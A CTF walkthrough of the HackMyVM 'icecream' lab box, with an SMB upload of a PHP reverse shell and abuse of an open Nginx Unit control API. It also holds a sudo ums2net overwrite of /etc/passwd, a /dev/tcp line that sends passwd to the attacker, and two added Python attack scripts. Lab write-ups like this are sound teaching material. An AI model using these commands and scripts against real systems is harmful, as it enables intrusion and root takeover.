HackMyVM-icecream-Walkthrough
城南花已开

Information gathering

Service enumeration

Port 80 just answers 403, so let's see what else is listening.

❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
You miss 100% of the ports you don't scan. - RustScan

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.56.113:22
Open 192.168.56.113:80
Open 192.168.56.113:139
Open 192.168.56.113:445
Open 192.168.56.113:9000
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-12 16:49 CST
Initiating Ping Scan at 16:49
Scanning 192.168.56.113 [4 ports]
Completed Ping Scan at 16:49, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:49
Completed Parallel DNS resolution of 1 host. at 16:49, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:49
Scanning 192.168.56.113 [5 ports]
Discovered open port 445/tcp on 192.168.56.113
Discovered open port 80/tcp on 192.168.56.113
Discovered open port 9000/tcp on 192.168.56.113
Discovered open port 139/tcp on 192.168.56.113
Discovered open port 22/tcp on 192.168.56.113
Completed SYN Stealth Scan at 16:49, 0.04s elapsed (5 total ports)
Nmap scan report for 192.168.56.113
Host is up, received reset ttl 63 (0.00060s latency).
Scanned at 2024-12-12 16:49:08 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
139/tcp open netbios-ssn syn-ack ttl 63
445/tcp open microsoft-ds syn-ack ttl 63
9000/tcp open cslistener syn-ack ttl 63

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds
Raw packets sent: 9 (372B) | Rcvd: 6 (260B)

Port 9000, on the other hand, can be accessed normally and returns a JSON document. Nmap labels the service cslistener, which sounds like some kind of listener, but that label is only the IANA name registered for port 9000, not a fingerprint of what is actually running.

{
"certificates": {},
"js_modules": {},
"config": {
"listeners": {},
"routes": [],
"applications": {}
},
"status": {
"modules": {
"python": {
"version": "3.11.2",
"lib": "/usr/lib/unit/modules/python3.11.unit.so"
},
"php": {
"version": "8.2.18",
"lib": "/usr/lib/unit/modules/php.unit.so"
},
"perl": {
"version": "5.36.0",
"lib": "/usr/lib/unit/modules/perl.unit.so"
},
"ruby": {
"version": "3.1.2",
"lib": "/usr/lib/unit/modules/ruby.unit.so"
},
"java": {
"version": "17.0.11",
"lib": "/usr/lib/unit/modules/java17.unit.so"
},
"wasm": {
"version": "0.1",
"lib": "/usr/lib/unit/modules/wasm.unit.so"
},
"wasm-wasi-component": {
"version": "0.1",
"lib": "/usr/lib/unit/modules/wasm_wasi_component.unit.so"
}
},
"connections": {
"accepted": 0,
"active": 0,
"idle": 0,
"closed": 0
},
"requests": {
"total": 0
},
"applications": {}
}
}

The JSON reads like a status report for some server: status.modules lists the loaded language modules (python, php, perl, ruby, java, wasm), and the config field holds the listeners, routes and applications, all of which are currently empty.

Let's brute-force directories on port 9000.

❯ gobuster dir -u http://$ip:9000 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.113:9000
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/config (Status: 200) [Size: 62]
/status (Status: 200) [Size: 862]
/certificates (Status: 200) [Size: 4]

/config holds nothing new; it is the same empty object seen above.

{
"listeners": {},
"routes": [],
"applications": {}
}

Change direction and check whether SMB is accessible. The icecream share's comment says tmp Folder, so it looks like it exports /tmp.

❯ smbclient -N -L  //$ip

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
icecream Disk tmp Folder
IPC$ IPC IPC Service (Samba 4.17.12-Debian)
nobody Disk Home Directories
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 192.168.56.113 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
❯ smbclient -N //$ip/icecream
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Dec 12 16:39:01 2024
.. D 0 Sun Oct 6 18:06:38 2024
.font-unix DH 0 Thu Dec 12 16:22:07 2024
systemd-private-7e87a6a94eb84f99a8fed57a685b389e-systemd-timesyncd.service-HzwZ4S D 0 Thu Dec 12 16:22:07 2024
.XIM-unix DH 0 Thu Dec 12 16:22:07 2024
.ICE-unix DH 0 Thu Dec 12 16:22:07 2024
systemd-private-7e87a6a94eb84f99a8fed57a685b389e-systemd-logind.service-ecsU5G D 0 Thu Dec 12 16:22:08 2024
.X11-unix DH 0 Thu Dec 12 16:22:07 2024

19480400 blocks of size 1024. 16161228 blocks available

Try uploading a PHP reverse shell (php-reverse-shell.php):

❯ smbclient -N   //$ip/icecream
Try "help" to get a list of possible commands.
smb: \> put php-reverse-shell.php
putting file php-reverse-shell.php as \php-reverse-shell.php (157.9 kb/s) (average 157.9 kb/s)
smb: \> ls
. D 0 Thu Dec 12 17:07:04 2024
.. D 0 Sun Oct 6 18:06:38 2024
.font-unix DH 0 Thu Dec 12 16:22:07 2024
systemd-private-7e87a6a94eb84f99a8fed57a685b389e-systemd-timesyncd.service-HzwZ4S D 0 Thu Dec 12 16:22:07 2024
.XIM-unix DH 0 Thu Dec 12 16:22:07 2024
.ICE-unix DH 0 Thu Dec 12 16:22:07 2024
systemd-private-7e87a6a94eb84f99a8fed57a685b389e-systemd-logind.service-ecsU5G D 0 Thu Dec 12 16:22:08 2024
.X11-unix DH 0 Thu Dec 12 16:22:07 2024
php-reverse-shell.php A 5496 Thu Dec 12 17:07:04 2024

19480400 blocks of size 1024. 16161216 blocks available

Back on port 80, request http://$ip/php-reverse-shell.php and the shell comes back. Port 80 returned 403 for /, but the file written through the share is served and executed from the web root, so the upload runs as www-data.

❯  curl $ip/php-reverse-shell.php
---------------- separator ------------
┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.113] 36242
Linux icecream 6.1.0-26-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.112-1 (2024-09-30) x86_64 GNU/Linux
10:12:59 up 50 min, 0 user, load average: 0.00, 0.00, 0.02
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

User privilege escalation

Check the users: there is an ice account, and www-data has no sudo rights.

$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:101:109:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
ice:x:1000:1000:ice,,,:/home/ice:/bin/bash
unit:x:999:995:unit user:/nonexistent:/bin/false

Port 9000 is the only thing not used yet. Upload pspy64 and look for scheduled tasks or interesting processes.

$ cd /tmp
$ wget 192.168.56.102/pspy64
--2024-12-12 10:21:31-- http://192.168.56.102/pspy64
Connecting to 192.168.56.102:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: 'pspy64'
$ chmod +x pspy64
$ ./pspy64

pspy shows the process behind port 9000: unit: main, started as root (UID=0) with --control 0.0.0.0:9000 and --user ice. The control API is therefore bound on every interface, and any application it launches runs as ice.

2024/12/13 12:12:37 CMD: UID=0     PID=378    | unit: main v1.33.0 [/usr/sbin/unitd --control 0.0.0.0:9000 --user ice]

That matches the guess. So how do we exploit port 9000? A search shows it is Nginx Unit.


Rather than spend time on the official docs, I asked GPT to explain it. The takeaway: Unit is configured entirely through this HTTP API.


I had GPT draft the applications object and then adjusted the port and a few other fields. Since my reverse shell is a PHP file, type is set to php.


A PUT with that object creates the application:

❯ curl -X PUT http://192.168.56.113:9000/config/applications \
-d '{"app":{"type":"php","root":"/tmp","script":"php-reverse-shell.php"}}'
{
"success": "Reconfiguration done."
}

❯ curl -X PUT -d '[{"action":{"share":"/tmp/php-reverse-shell.php$uri","fallback":{"pass":"applications/app"}}}]' http://192.168.56.113:9000/config/routes
{
"success": "Reconfiguration done."
}
❯ curl -X PUT -d '{"*:8888":{"pass":"routes"}}' http://192.168.56.113:9000/config/listeners
{
"success": "Reconfiguration done."
}

The final config chains the three pieces together: a listener on *:8888 that passes to routes, a route whose fallback passes to applications/app, and the php application rooted at /tmp with php-reverse-shell.php as its script.


With a listener up on the port set in php-reverse-shell.php, request http://192.168.56.113:8888.
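The whole chain above as one script: fingerprinting the JSON on port 9000 as Nginx Unit's control API, then pushing the configuration that makes Unit run the PHP file as ice. This is an added example, not code from the write-up or from the Unit project. It differs from the curl steps above in two ways: it PUTs one complete config object in a single request, and the listener passes straight to the application instead of going through a route. The control address, /tmp, php-reverse-shell.php and port 8888 are the page's values; the function names and the DELETE cleanup are this example's own.

```python
"""Abuse an unauthenticated Nginx Unit control API to run a PHP script as its --user.

Added example, not from the write-up. Values from the page: control API on
192.168.56.113:9000, script /tmp/php-reverse-shell.php, new listener on 8888.
"""
import json
import sys
import urllib.request

CONTROL = "http://192.168.56.113:9000"        # page value; override via argv[1]
UNIT_TOP_LEVEL_KEYS = {"certificates", "config", "status"}


def looks_like_unit_control(body: str) -> bool:
    """Fingerprint the JSON that a bare GET / on the control port returns.

    Unit answers with an object whose top-level keys include "certificates",
    "config" and "status", and lists loaded language modules under
    status.modules with library paths below .../unit/modules/.
    """
    try:
        doc = json.loads(body)
    except ValueError:
        return False
    if not isinstance(doc, dict) or not UNIT_TOP_LEVEL_KEYS.issubset(doc):
        return False
    modules = doc.get("status", {}).get("modules", {})
    return any("/unit/modules/" in m.get("lib", "") for m in modules.values())


def build_unit_config(root: str, script: str, port: int, app: str = "app") -> dict:
    """Complete config: one listener that passes straight to one PHP application.

    Unit launches the application as the user it was started with (--user ice
    on this box), so whatever `script` does runs as that user.
    """
    return {
        "listeners": {f"*:{port}": {"pass": f"applications/{app}"}},
        "applications": {app: {"type": "php", "root": root, "script": script}},
    }


def _api(method: str, path: str, payload=None) -> dict:
    """One JSON request against the control API (no auth: it has none)."""
    data = None if payload is None else json.dumps(payload).encode()
    req = urllib.request.Request(CONTROL + path, data=data, method=method,
                                 headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.loads(resp.read())


def push_config(cfg: dict) -> bool:
    """Replace the whole config with one PUT, then read it back to confirm."""
    ack = _api("PUT", "/config", cfg)
    if ack.get("success") != "Reconfiguration done.":
        return False
    live = _api("GET", "/config").get("listeners", {})
    return all(name in live for name in cfg["listeners"])


def remove_listener(port: int) -> dict:
    """Cleanup: deleting the listener closes the port again."""
    return _api("DELETE", f"/config/listeners/*:{port}")


if __name__ == "__main__":
    if len(sys.argv) > 1:
        CONTROL = sys.argv[1]
    banner = urllib.request.urlopen(CONTROL, timeout=10).read().decode()
    if not looks_like_unit_control(banner):
        sys.exit("port does not look like a Unit control API")
    cfg = build_unit_config("/tmp", "php-reverse-shell.php", 8888)
    if not push_config(cfg):
        sys.exit("reconfiguration failed")
    # Start the catcher (rlwrap nc -lnvp ...) first; the script fires on this request.
    host = CONTROL.rsplit(":", 1)[0]
    print(f"now request {host}:8888/ with your listener up")
```

The fingerprint check matters because nmap's cslistener label says nothing about the service; the JSON shape does. Run remove_listener(8888) once you have the shell so the extra port does not stay open for the next person.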

That gives a shell as ice.

Root privilege escalation

ice@icecream:/$ sudo -l
sudo -l
Matching Defaults entries for ice on icecream:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
use_pty

User ice may run the following commands on icecream:
(ALL) NOPASSWD: /usr/sbin/ums2net

ice has one sudo entry.

It can run ums2net, which I had never heard of. A search shows it is a tool that exposes USB mass storage over the network.

grandpaul/ums2net

Following its config file format we can write a single config line. The tool is meant to write incoming data to a USB storage device, but with no device present the of= target can be any file on the system, for example sudoers or passwd; just change of=.

Let's modify passwd: keep only the root line and delete the x in the second (password) field, so root has no password.

ice@icecream:/$ cat /etc/passwd > /dev/tcp/192.168.56.102/1234
------------------------- separator ------------------------
┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lnvp 1234>passwd
listening on [any] 1234 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.113] 52296
┌──(kali㉿kali)-[~]
└─$ vim passwd
┌──(kali㉿kali)-[~]
└─$ cat passwd
root::0:0:root:/root:/bin/bash
------------------------ separator -------------------------------
ice@icecream:/tmp$ echo '6666 of=/etc/passwd bs=4096' > config
ice@icecream:/tmp$ sudo /usr/sbin/ums2net -c config -d
ums2net[1037]: Totally write 31 bytes to /etc/passwd
------------------------ separator -----------------------------
┌──(kali㉿kali)-[~]
└─$ nc -v 192.168.56.113 6666 < passwd
192.168.56.113: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.56.113] 6666 (?) open
^C

The edited passwd is sent back to the target through port 6666, and ums2net writes it into /etc/passwd.
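The same write-back as a script, added here and not part of the write-up. It edits a copy of /etc/passwd so that only root's password field is blanked, keeping every other account intact (the write-up sent a one-line file containing just root), and streams the result to the ums2net listener. The port and the config line come from the page. Whether ums2net truncates the target before writing is not something the page shows; sending the full file, which is exactly one byte shorter than the original, means that even without truncation nothing more than a trailing newline could be left behind.

```python
"""Push a modified /etc/passwd through a sudo-able ums2net listener.

Added example, not from the write-up. From the page: the config line
"6666 of=/etc/passwd bs=4096" makes ums2net write whatever arrives on TCP 6666
into /etc/passwd, and an empty password field lets `su` become root with no
password. Host and port are the lab values used on the page.
"""
import socket
import sys

TARGET = ("192.168.56.113", 6666)


def blank_root_password(passwd: bytes) -> bytes:
    """Return the passwd file with only root's password field emptied.

    Every other line is kept byte for byte, so the box keeps its accounts
    (the write-up sent a file containing just the root line). A passwd line
    has seven colon-separated fields; the second is the password field, and
    "x" there means "look in /etc/shadow".
    """
    lines = []
    for line in passwd.split(b"\n"):
        fields = line.split(b":")
        if len(fields) == 7 and fields[0] == b"root":
            fields[1] = b""
        lines.append(b":".join(fields))
    return b"\n".join(lines)


def send_to_ums2net(data: bytes, target=TARGET) -> int:
    """Stream the bytes to the listener; ums2net logs "Totally write N bytes".

    Closing our sending side is what `nc < file` does at EOF. The write-up
    still had to Ctrl-C nc afterwards, so do not expect the server to hang up.
    """
    with socket.create_connection(target, timeout=10) as s:
        s.sendall(data)
        s.shutdown(socket.SHUT_WR)
    return len(data)


if __name__ == "__main__":
    # Usage (script name is hypothetical): ums2net_passwd.py passwd-copy
    # where passwd-copy is the file pulled off the target, e.g. with the
    # /dev/tcp trick shown above.
    with open(sys.argv[1], "rb") as fh:
        original = fh.read()
    patched = blank_root_password(original)
    if patched == original:
        sys.exit("no root line with a password field found; nothing to do")
    sent = send_to_ums2net(patched)
    print(f"sent {sent} bytes; ums2net should log the same count")
```

The byte count returned is the check: it should equal the N in ums2net's "Totally write N bytes" line on the target, the way 31 matched the one-line file above.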

Disconnect the shell, reconnect, and a plain su switches to root. I forgot to read user.txt earlier, so both flags are read at once.

ice@icecream:/$ su
root@icecream:/# id
uid=0(root) gid=0(root) grupos=0(root)
root@icecream:~# cat /home/ice/user.txt
HMVaneraseroflove
root@icecream:~# cat root.txt
HMViminvisible